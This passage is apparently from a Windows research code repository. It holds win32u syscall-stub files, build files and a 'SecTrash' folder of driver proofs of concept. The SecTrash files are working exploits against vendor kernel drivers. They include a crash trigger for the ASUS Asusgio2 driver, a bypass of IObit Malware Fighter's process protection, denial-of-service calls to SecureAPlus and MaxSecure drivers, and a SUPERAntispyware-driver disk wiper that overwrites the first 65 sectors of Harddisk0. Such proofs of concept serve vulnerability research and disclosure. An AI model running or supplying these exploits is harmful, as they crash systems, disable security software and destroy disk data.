2019 4 | * 5 | * TITLE: MAIN.C 6 | * 7 | * VERSION: 1.01 8 | * 9 | * DATE: 06 Dec 2019 10 | * 11 | * Syscall stubs for NtUser/NtGdi 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | 20 | #if !defined UNICODE 21 | #error ANSI build is not supported 22 | #endif 23 | 24 | #if defined (_MSC_VER) 25 | #if (_MSC_VER >= 1900) //VS15, 17 etc 26 | #ifdef _DEBUG 27 | #pragma comment(lib, "vcruntimed.lib") 28 | #pragma comment(lib, "ucrtd.lib") 29 | #else 30 | #pragma comment(lib, "libucrt.lib") 31 | #pragma comment(lib, "libvcruntime.lib") 32 | #endif 33 | #endif 34 | #endif 35 | 36 | #include 37 | 38 | // 39 | // These files are machine generated, do not edit. 40 | // 41 | #ifdef _RELEASE_FOR_CHECKED 42 | #include "w32kcall_checked.h" 43 | #include "w32parguments_checked.h" 44 | #else 45 | #include "w32kcall.h" 46 | #include "w32parguments.h" 47 | #endif 48 | 49 | ULONG W32pServiceLimit = sizeof(W32pServiceArgumentTable); 50 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by ver.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/ver.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ROS/win32u/win32u/ver.rc -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/w32parguments.h: -------------------------------------------------------------------------------- 1 | /* MACHINE GENERATED, DO NOT EDIT */ 2 | UCHAR W32pServiceArgumentTable[] = { 3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1, 4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2, 5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0, 6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5, 7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2, 8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1, 9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1, 10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1, 11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3, 12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3, 13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3, 14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3, 15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2, 16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 }; 17 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/w32parguments_checked.h: -------------------------------------------------------------------------------- 1 | /* MACHINE GENERATED, DO NOT EDIT */ 2 | UCHAR W32pServiceArgumentTable[] = { 3 | 1, 1, 6, 4, 5, 2, 3, 12, 6, 0, 1, 10, 1, 11, 1, 8, 1, 2, 2, 6, 4, 3, 1, 4, 2, 5, 1, 1, 8, 3, 1, 6, 11, 9, 4, 1, 3, 1, 2, 3, 4, 4, 6, 6, 2, 4, 1, 1, 1, 7, 1, 4 | 3, 3, 2, 2, 3, 2, 2, 2, 1, 8, 8, 2, 6, 1, 1, 2, 2, 1, 2, 5, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 2, 2, 3, 2, 11, 2, 2, 1, 2, 2, 2, 2, 3, 3, 3, 2, 2, 2, 3, 2, 5 | 2, 2, 2, 2, 4, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 3, 2, 6, 1, 1, 2, 1, 4, 2, 4, 6, 4, 5, 1, 1, 1, 1, 5, 1, 7, 4, 2, 7, 5, 11, 3, 8, 5, 3, 3, 9, 1, 3, 1, 0, 6 | 2, 5, 5, 4, 2, 3, 2, 3, 6, 6, 1, 6, 2, 2, 1, 3, 1, 2, 3, 2, 2, 2, 9, 2, 3, 5, 7, 5, 6, 8, 3, 3, 2, 3, 2, 2, 2, 4, 4, 3, 3, 2, 3, 3, 2, 7, 4, 5, 1, 5, 7 | 1, 3, 5, 8, 4, 3, 3, 6, 7, 10, 0, 2, 2, 2, 7, 6, 5, 8, 0, 0, 5, 2, 3, 5, 2, 13, 3, 1, 4, 3, 3, 7, 6, 5, 1, 11, 4, 5, 4, 3, 3, 3, 1, 5, 2, 2, 6, 1, 5, 2, 8 | 2, 7, 1, 6, 6, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 4, 2, 2, 2, 16, 1, 3, 3, 3, 3, 1, 3, 1, 1, 3, 4, 2, 5, 2, 3, 3, 5, 3, 4, 1, 12, 16, 1, 1, 1, 5, 11, 2, 1, 1, 9 | 1, 1, 2, 3, 3, 3, 2, 8, 1, 4, 7, 4, 4, 2, 2, 2, 3, 3, 2, 4, 1, 2, 3, 2, 4, 2, 3, 4, 1, 0, 1, 1, 3, 2, 3, 0, 2, 4, 5, 1, 4, 15, 7, 3, 5, 3, 8, 2, 3, 1, 10 | 2, 1, 1, 1, 1, 1, 3, 5, 4, 4, 7, 11, 5, 0, 3, 3, 2, 0, 2, 4, 5, 4, 1, 2, 4, 3, 5, 1, 6, 2, 1, 1, 2, 0, 1, 5, 3, 2, 3, 0, 0, 0, 1, 2, 3, 4, 3, 4, 1, 1, 11 | 3, 0, 0, 2, 2, 6, 4, 4, 2, 3, 2, 1, 1, 3, 1, 1, 4, 2, 4, 4, 5, 5, 0, 2, 0, 3, 5, 4, 3, 3, 3, 2, 2, 1, 2, 3, 3, 1, 2, 2, 3, 1, 4, 2, 3, 4, 12, 3, 3, 3, 12 | 1, 2, 7, 1, 1, 0, 4, 4, 7, 3, 0, 2, 2, 6, 3, 4, 4, 2, 3, 3, 2, 1, 5, 4, 4, 3, 3, 4, 2, 1, 2, 3, 6, 2, 4, 7, 4, 4, 3, 1, 1, 3, 2, 4, 1, 4, 7, 8, 3, 3, 13 | 1, 2, 1, 4, 3, 3, 1, 2, 1, 2, 4, 1, 5, 1, 2, 4, 4, 4, 1, 1, 3, 2, 3, 1, 4, 2, 1, 3, 4, 2, 4, 2, 2, 4, 1, 2, 2, 4, 2, 4, 2, 7, 3, 3, 6, 4, 3, 8, 1, 3, 14 | 2, 2, 0, 1, 4, 1, 2, 6, 7, 1, 6, 5, 6, 3, 2, 1, 1, 1, 1, 3, 0, 2, 3, 3, 10, 4, 4, 2, 3, 1, 2, 1, 3, 3, 1, 0, 6, 2, 0, 3, 4, 0, 0, 3, 3, 6, 4, 4, 6, 3, 15 | 6, 1, 1, 3, 1, 1, 11, 11, 11, 1, 8, 7, 10, 5, 9, 7, 10, 8, 10, 13, 4, 2, 1, 3, 5, 1, 1, 0, 1, 1, 2, 1, 1, 5, 2, 3, 1, 5, 1, 1, 2, 2, 2, 3, 3, 4, 1, 1, 2, 2, 16 | 1, 4, 3, 1, 1, 4, 6, 1, 4, 2, 1, 3, 2, 2, 2, 1, 1, 2, 1, 4, 4, 4, 4, 4, 2, 3, 2, 2, 3, 1, 1 }; 17 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/win32u.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/win32u.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/SecTrash/asusgio2.c: -------------------------------------------------------------------------------- 1 | NTSTATUS CallDriver( 2 | _In_ HANDLE DeviceHandle, 3 | _In_ ULONG IoControlCode, 4 | _In_ PVOID InputBuffer, 5 | _In_ ULONG InputBufferLength, 6 | _In_opt_ PVOID OutputBuffer, 7 | _In_opt_ ULONG OutputBufferLength) 8 | { 9 | BOOL bResult = FALSE; 10 | IO_STATUS_BLOCK ioStatus; 11 | 12 | return NtDeviceIoControlFile(DeviceHandle, 13 | NULL, 14 | NULL, 15 | NULL, 16 | &ioStatus, 17 | IoControlCode, 18 | InputBuffer, 19 | InputBufferLength, 20 | OutputBuffer, 21 | OutputBufferLength); 22 | 23 | } 24 | 25 | BOOL supWriteBufferToFile( 26 | _In_ LPWSTR lpFileName, 27 | _In_ PVOID Buffer, 28 | _In_ DWORD BufferSize 29 | ) 30 | { 31 | HANDLE hFile; 32 | DWORD bytesIO; 33 | 34 | hFile = CreateFileW(lpFileName, 35 | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); 36 | 37 | if (hFile == INVALID_HANDLE_VALUE) { 38 | return FALSE; 39 | } 40 | 41 | WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL); 42 | CloseHandle(hFile); 43 | 44 | return (bytesIO == BufferSize); 45 | } 46 | 47 | int main() 48 | { 49 | // 50 | // Uncomment to generate unlocking resource. 51 | // 52 | /* 53 | AES_ctx ctx; 54 | DWORD a[4] = { 0x16157EAA, 0xA6D2AE28, 0x8815F7AB, 0x3C4FCF09 }; 55 | BYTE Buffer[16]; 56 | AES_init_ctx(&ctx, (uint8_t*)a); 57 | LARGE_INTEGER fileTime; 58 | ULONG seconds = 0; 59 | GetSystemTimePreciseAsFileTime((PFILETIME)&fileTime); 60 | RtlTimeToSecondsSince1970(&fileTime, &seconds); 61 | RtlSecureZeroMemory(&Buffer, sizeof(Buffer)); 62 | RtlCopyMemory(Buffer, &seconds, sizeof(DWORD)); 63 | AES_ECB_encrypt(&ctx, (uint8_t*)Buffer); 64 | supWriteBufferToFile((LPWSTR)L"ASUSCERT.bin", Buffer, sizeof(Buffer)); 65 | return; 66 | */ 67 | 68 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\Asusgio2"), 69 | GENERIC_READ | GENERIC_WRITE, 70 | 0, 71 | NULL, 72 | OPEN_EXISTING, 73 | 0, 74 | NULL); 75 | 76 | if (deviceHandle == INVALID_HANDLE_VALUE) { 77 | printf_s("[!] Unable to open device\r\n"); 78 | return -1; 79 | } 80 | else { 81 | printf_s("[+] Asusgio2 device opened\r\n"); 82 | } 83 | 84 | 85 | printf_s("[+] Hit any key to BSOD\r\n"); 86 | system("pause"); 87 | 88 | UCHAR dBuffer[100]; 89 | 90 | NTSTATUS ntStatus = CallDriver(deviceHandle, 91 | 0xA0402450, 92 | &dBuffer, 93 | 1024, 94 | NULL, 95 | 0); 96 | 97 | if (!NT_SUCCESS(ntStatus)) { 98 | printf_s("[!] Failed, NTSTATUS (0x%lX)\r\n", ntStatus); 99 | } 100 | 101 | CloseHandle(deviceHandle); 102 | 103 | return 0; 104 | } 105 | -------------------------------------------------------------------------------- /source/SecTrash/iobitcallbacks.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | typedef struct _CALL_DRV { 33 | ULONG Value1; 34 | ULONG Value2; 35 | HANDLE Pid1; 36 | HANDLE Pid2; 37 | BYTE Spare[392]; 38 | } CALL_DRV, * PCALL_DRV; 39 | 40 | int main() 41 | { 42 | NTSTATUS ntStatus; 43 | 44 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\ImfObCallback"), 45 | GENERIC_READ | GENERIC_WRITE, 46 | 0, 47 | NULL, 48 | OPEN_EXISTING, 49 | 0, 50 | NULL); 51 | 52 | if (deviceHandle == INVALID_HANDLE_VALUE) { 53 | printf_s("[!] Unable to open device\r\n"); 54 | #ifndef _DEBUG 55 | return -1; 56 | #endif 57 | } 58 | else { 59 | printf_s("[+] ImfObCallback device opened\r\n"); 60 | } 61 | 62 | // 63 | // Remove protection from IOBit processes. 64 | // IMF.exe 65 | // IMFCore.exe 66 | // 67 | 68 | ntStatus = CallDriver(deviceHandle, 69 | 0x22200C, 70 | NULL, 71 | 0, 72 | NULL, 73 | 0); 74 | 75 | if (NT_SUCCESS(ntStatus)) { 76 | printf_s("[~] Protection removed\r\n"); 77 | } 78 | else { 79 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus); 80 | } 81 | 82 | system("pause"); 83 | 84 | // 85 | // Protect ourself. 86 | // 87 | 88 | CALL_DRV request; 89 | DWORD procId1 = GetCurrentProcessId(), procId2; 90 | 91 | GetWindowThreadProcessId(GetDesktopWindow(), &procId2); //anything else 92 | 93 | RtlZeroMemory(&request, sizeof(request)); 94 | 95 | request.Pid1 = UlongToHandle(procId1); 96 | request.Pid2 = UlongToHandle(procId2); 97 | 98 | ntStatus = CallDriver(deviceHandle, 99 | 0x222008, 100 | &request, 101 | sizeof(request), 102 | NULL, 103 | 0); 104 | 105 | if (NT_SUCCESS(ntStatus)) { 106 | printf_s("[~] Protection installed, try to kill me\r\n"); 107 | } 108 | else { 109 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus); 110 | } 111 | 112 | system("pause"); 113 | 114 | CloseHandle(deviceHandle); 115 | } 116 | -------------------------------------------------------------------------------- /source/SecTrash/maxproc64.c: -------------------------------------------------------------------------------- 1 | int main() 2 | { 3 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"), 4 | GENERIC_READ | GENERIC_WRITE, 5 | 0, 6 | NULL, 7 | OPEN_EXISTING, 8 | 0, 9 | NULL); 10 | 11 | if (deviceHandle == INVALID_HANDLE_VALUE) { 12 | printf_s("[!] Unable to open device\r\n"); 13 | return -1; 14 | } 15 | else { 16 | printf_s("[+] MaxProc64 device opened\r\n"); 17 | } 18 | 19 | NTSTATUS ntStatus; 20 | 21 | ntStatus = CallDriver(deviceHandle, 22 | 0x220019, 23 | (PVOID)0xFFFFFFFF12345678, 24 | 0, 25 | NULL, 26 | 0); 27 | 28 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus); 29 | 30 | 31 | CloseHandle(deviceHandle); 32 | } 33 | -------------------------------------------------------------------------------- /source/SecTrash/readme.txt: -------------------------------------------------------------------------------- 1 | secureaplus.c - SecureAPlus AV SAScan driver Denial of Service 2 | iobitcallbacks.c - IObit Malware Fighter ImfObCallback.sys bypass 3 | bkavsp.c - BKAVSP Arbitrary File Deletion 4 | superantispyware.c - SUPERAntispyware disk wiper 5 | maxproc64.c - MaxSecure MaxProc64 driver Denial of Service 6 | iobit_winring0.c - IOBit WinRing0 driver information disclosure 7 | asusgio2.c - ASUS GiveIO driver unlock 8 | logitech.c - Logitech LgCoreTemp.sys driver information disclosure 9 | enetech.c - EneTech driver arbitrary kernel memory read/information disclosure 10 | glckio2.c - Gigabyte glckio2 driver information disclosure/unlock 11 | -------------------------------------------------------------------------------- /source/SecTrash/secureaplus.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | int main() 33 | { 34 | NTSTATUS ntStatus; 35 | 36 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SAScan"), 37 | GENERIC_READ | GENERIC_WRITE, 38 | 0, 39 | NULL, 40 | OPEN_EXISTING, 41 | 0, 42 | NULL); 43 | 44 | if (deviceHandle == INVALID_HANDLE_VALUE) { 45 | printf_s("[!] Unable to open device\r\n"); 46 | #ifndef _DEBUG 47 | return -1; 48 | #endif 49 | } 50 | else { 51 | printf_s("[+] SAScan device opened\r\n"); 52 | } 53 | 54 | ntStatus = CallDriver(deviceHandle, 55 | 0x9C40E404, 56 | NULL, 57 | 0, 58 | NULL, 59 | 0); 60 | 61 | printf_s("[~] (NTSTATUS 0x%lx)\r\n", ntStatus); 62 | 63 | system("pause"); 64 | 65 | CloseHandle(deviceHandle); 66 | } 67 | -------------------------------------------------------------------------------- /source/SecTrash/superantispyware.c: -------------------------------------------------------------------------------- 1 | #pragma warning(disable: 4005) 2 | 3 | #include 4 | #include 5 | #include 6 | #include "ntos.h" 7 | 8 | NTSTATUS CallDriver( 9 | _In_ HANDLE DeviceHandle, 10 | _In_ ULONG IoControlCode, 11 | _In_opt_ PVOID InputBuffer, 12 | _In_opt_ ULONG InputBufferLength, 13 | _In_opt_ PVOID OutputBuffer, 14 | _In_opt_ ULONG OutputBufferLength) 15 | { 16 | BOOL bResult = FALSE; 17 | IO_STATUS_BLOCK ioStatus; 18 | 19 | return NtDeviceIoControlFile(DeviceHandle, 20 | NULL, 21 | NULL, 22 | NULL, 23 | &ioStatus, 24 | IoControlCode, 25 | InputBuffer, 26 | InputBufferLength, 27 | OutputBuffer, 28 | OutputBufferLength); 29 | 30 | } 31 | 32 | #pragma pack(push, 1) 33 | typedef struct _CALL_DRV { 34 | WCHAR DeviceName[2048]; 35 | LARGE_INTEGER StartingOffset; // +0x1000 36 | SIZE_T DataSize; // +0x1008 37 | PVOID DataPtr; // +0x1010 38 | } CALL_DRV, * PCALL_DRV; 39 | #pragma pack(pop) 40 | 41 | ULONG u = FIELD_OFFSET(CALL_DRV, DataPtr); 42 | 43 | #define SAS_DEVICE 0x9C40 44 | #define IOCTL_SAS_CALLDRIVER CTL_CODE(SAS_DEVICE, 0x850, METHOD_BUFFERED, FILE_ANY_ACCESS) 45 | 46 | int main() 47 | { 48 | NTSTATUS ntStatus; 49 | CALL_DRV request; 50 | 51 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SASKUTIL"), 52 | GENERIC_READ | GENERIC_WRITE, 53 | 0, 54 | NULL, 55 | OPEN_EXISTING, 56 | 0, 57 | NULL); 58 | 59 | if (deviceHandle == INVALID_HANDLE_VALUE) { 60 | printf_s("[!] Unable to open device\r\n"); 61 | #ifndef _DEBUG 62 | return -1; 63 | #endif 64 | } 65 | else { 66 | printf_s("[+] SASKUTIL device opened\r\n"); 67 | } 68 | 69 | system("pause"); 70 | 71 | WCHAR writeData[512]; 72 | 73 | memset(&writeData, 0xAB, sizeof(writeData)); 74 | RtlSecureZeroMemory(&request, sizeof(request)); 75 | 76 | wcscpy_s(request.DeviceName, L"\\Device\\Harddisk0\\DR0"); 77 | request.DataSize = sizeof(writeData); 78 | request.DataPtr = &writeData; 79 | 80 | for (ULONG i = 0; i < 65; i++) { 81 | 82 | request.StartingOffset.LowPart = (i * 512); 83 | 84 | ntStatus = CallDriver(deviceHandle, 85 | IOCTL_SAS_CALLDRIVER, 86 | &request, 87 | sizeof(CALL_DRV), 88 | NULL, 89 | 0); 90 | 91 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus); 92 | } 93 | 94 | CloseHandle(deviceHandle); 95 | } 96 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StripDebug", "StripDebug.vcxproj", "{177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.ActiveCfg = Debug|x64 15 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.Build.0 = Debug|x64 16 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.ActiveCfg = Release|x64 17 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {a2258c3e-0c10-4091-bb15-4cfbc255d0c5} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | minirtl 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | minirtl 38 | 39 | 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | minirtl 52 | 53 | 54 | Header Files 55 | 56 | 57 | -------------------------------------------------------------------------------- /source/StripDebug/StripDebug.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\MAKEEXE\StripDebug\StripDebug\test.exe 5 | WindowsLocalDebugger 6 | 7 | 8 | C:\MAKEEXE\StripDebug\StripDebug\test.exe 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /source/StripDebug/cui.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018 4 | * 5 | * TITLE: CUI.H 6 | * 7 | * VERSION: 1.30 8 | * 9 | * DATE: 01 Aug 2018 10 | * 11 | * Common header file for console ui. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | VOID cuiInitialize( 22 | _In_ BOOL InitInput, 23 | _Out_opt_ PBOOL IsConsoleOutput 24 | ); 25 | 26 | #ifdef _UNICODE 27 | #define cuiPrintText cuiPrintTextW 28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW 29 | #else 30 | #define cuiPrintText cuiPrintTextA 31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA 32 | #endif 33 | 34 | 35 | VOID cuiPrintTextA( 36 | _In_ LPSTR lpText, 37 | _In_ BOOL UseReturn 38 | ); 39 | 40 | VOID cuiPrintTextW( 41 | _In_ LPWSTR lpText, 42 | _In_ BOOL UseReturn 43 | ); 44 | 45 | VOID cuiPrintTextLastErrorA( 46 | _In_ BOOL UseReturn 47 | ); 48 | 49 | VOID cuiPrintTextLastErrorW( 50 | _In_ BOOL UseReturn 51 | ); 52 | 53 | VOID cuiClrScr( 54 | VOID 55 | ); 56 | -------------------------------------------------------------------------------- /source/StripDebug/global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | //disable nonmeaningful warnings. 4 | #pragma warning(disable: 4091) //'typedef ': ignored on left of '' when no variable is declared 5 | #pragma warning(disable: 4005) // macro redefinition 6 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 7 | #pragma warning(disable: 4054) // %s : from function pointer %s to data pointer %s 8 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u 9 | 10 | #include 11 | #include 12 | #include "cui.h" 13 | #include "minirtl\minirtl.h" 14 | #include "minirtl\cmdline.h" 15 | 16 | #pragma comment(lib, "dbghelp.lib") 17 | #pragma comment(lib, "imagehlp.lib") 18 | 19 | #if !defined UNICODE 20 | #error ANSI build is not supported 21 | #endif 22 | 23 | #if defined (_MSC_VER) 24 | #if (_MSC_VER >= 1910) 25 | #ifdef _DEBUG 26 | #pragma comment(lib, "vcruntimed.lib") 27 | #pragma comment(lib, "ucrtd.lib") 28 | #else 29 